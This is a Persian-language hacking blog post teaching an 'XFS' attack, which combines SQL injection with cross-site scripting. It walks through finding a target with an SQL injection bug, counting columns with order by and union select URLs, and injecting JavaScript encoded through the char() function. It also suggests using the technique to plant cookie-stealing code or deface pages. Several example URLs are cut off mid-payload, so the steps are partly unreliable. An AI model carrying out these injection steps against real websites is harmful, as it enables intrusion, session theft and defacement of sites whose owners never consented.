مرجع دانلود برق, هک و امنیت

Don't Learn to HACK * Hack to LEARN :::: ثبت شده در ستاد ساماندهی

Don't Learn to HACK * Hack to LEARN :::: ثبت شده در ستاد ساماندهی

مرجع دانلود برق, هک و امنیت

برترین مرجع تخصصی برق, هک و امنیت

::::: ثبت شده در ستاد ساماندهی :::::

*** Special reference Power, Hacking and Security ***


mehrdadtk.tk
جستجوگر سریع
تبلیغات
آخرین نظرات
  • ۲۳ فروردين ۹۶، ۱۶:۱۵ - کیوان رضازاده اقدم
    وب خوبیست
نویسندگان

Future Google PR for mehrdad1.blog.ir - 6.33 Trust Rank for mehrdad1.blog.ir - 8.67

Flag Counter

Рейтинг@Mail.ru مرجع دانلود برق, هک و امنیت

Website Security Test

آموزش حملات XFS

جمعه, ۲۵ بهمن ۱۳۹۲، ۰۹:۳۹ ق.ظ

XFS ترکیبی از حملاتی XSS و SQL injection میباشد یعنی شما میتوانید باگ SQL injection خود را به XSS تبدیل کنید برای اینکه بتوانید XFS را بشکلی کامل بیاموزید باید حتما با باگی XSS و SQL injection بلد باشید اگر با این دو با آشنایی ندارید از همین جا خواندن این آموزش را قطع کنید ....

ما در حملات XFS برای اینکه بتوانیم کد های جاوا اسکریپت خود را روی سایت تزریق کنیم از دستوری یا تابع char() استفاده میکنیم یعنی میتوانم بگویم که تمامی کارایی حملاتی XFS مربوطی تابع Char() است ...
در گامی اول شما باید یک Target پیدا کنید که باگی SQL Injection را داشته باشد و بعد با استفاده از دستوراتی پایین تعدادی Column های تارگیت را پیدا میکنیم:
www.target.com/index.php?id=2+order+by+column numbers
http://www.target.com/index.php?id=2...select+columns...
بعد از اینکه تعدادی columns ها را پیدا کردیم باید columns آسیب پذیری سایت هدف را پیدا کنیم هر سایت که باگ Sql دارد یک column آسیب پذیر دارد که ما با استفاده از همون column دستوراتی خود را تزریق میکنیم من در اینجا بصورت فرضی تعدادی column های سایت هدف را 10 و column آسیب پذیر را 6 انتخاب کردم به مثال ها دقت کنید:
http://www.target.com/index.php?id=2...5,6,7,8,9,10-- Columns Numbers
http://www.target.com/index.php?id=2...r(),7,8,9,10-- char function usage
خوب تا اینجا که همش SQL injection بود حالا میرسیم به اصلی موضوع (XFS):
ما برای اینکه بتوانیم کدهای javascript خود را به سایت تزریق کنیم باید کدهای خود را به ASCII تبدیل کنیم که یک الگوریم خاص جهت Encrypt کردن است ...مثلا به این کد همتون آشناه هستید :


اگر اینو به ASCII تبدیل کنیم به این شکل میشود:
60 115 99 114 105 112 116 62 97 108 101 114 116 40 39 104 105 39 41 60 47 115 99 114 105 112 116 62

برای تبدیل کردن کدهای جاوا اسکریپت به ascii از سایت زیر استفاه کنید:
http://facegroup.nazuka.net/hex.php
به کدی ascii بالا دقت کنید میبینید که در بینی هر دو عدد یک فاصله یا Space است که باید ما این فاصله ها را به (,) تبدیل کنیم مانندی این:

60,115,99,114,105,112,116,62,97,108,101,114,116,40 ,39,104

,105,39,41,60,47,115,99,114,105,112,116,62
وبعد در بینی دستوری char() بگذاریم و در سایت به این شکل تزریق کنیم:

http://www.target.com/index.php?id=2...99,114,105,112

,116,62,97,108,101,114,116,40,39,104,105,39,41,60, 47,115,99,114,105,112,116,62),7,8,9,10--
حالا شما نتیجه کدی خود را بنگرید....توجه داشته باشید که باید فاصله های بین کد را به (,) تبدیل کنید در غیری آن کدی شما اجرا نخواهد شد در ضمن در بینی کدی جاوا اسکریپت شما هم باید هیچ فاصله نباشد!!!
شما با استفاده از XFS میتوانید کد های جهت دزدیدنی کوکی را نیز به سایت تزریق کنید و یا کدی Deface Page خود را تزریق کنید...


موافقین ۱ مخالفین ۰ ۹۲/۱۱/۲۵ تعداد نمایش مطلب : ۶۳۸

نظرات  (۰)

هیچ نظری هنوز ثبت نشده است

ارسال نظر

کاربران بیان میتوانند بدون نیاز به تأیید، نظرات خود را ارسال کنند.
اگر قبلا در بیان ثبت نام کرده اید لطفا ابتدا وارد شوید، در غیر این صورت می توانید ثبت نام کنید.
شما میتوانید از این تگهای html استفاده کنید:
<b> یا <strong>، <em> یا <i>، <u>، <strike> یا <s>، <sup>، <sub>، <blockquote>، <code>، <pre>، <hr>، <br>، <p>، <a href="" title="">، <span style="">، <div align="">
تجدید کد امنیتی

Free counters!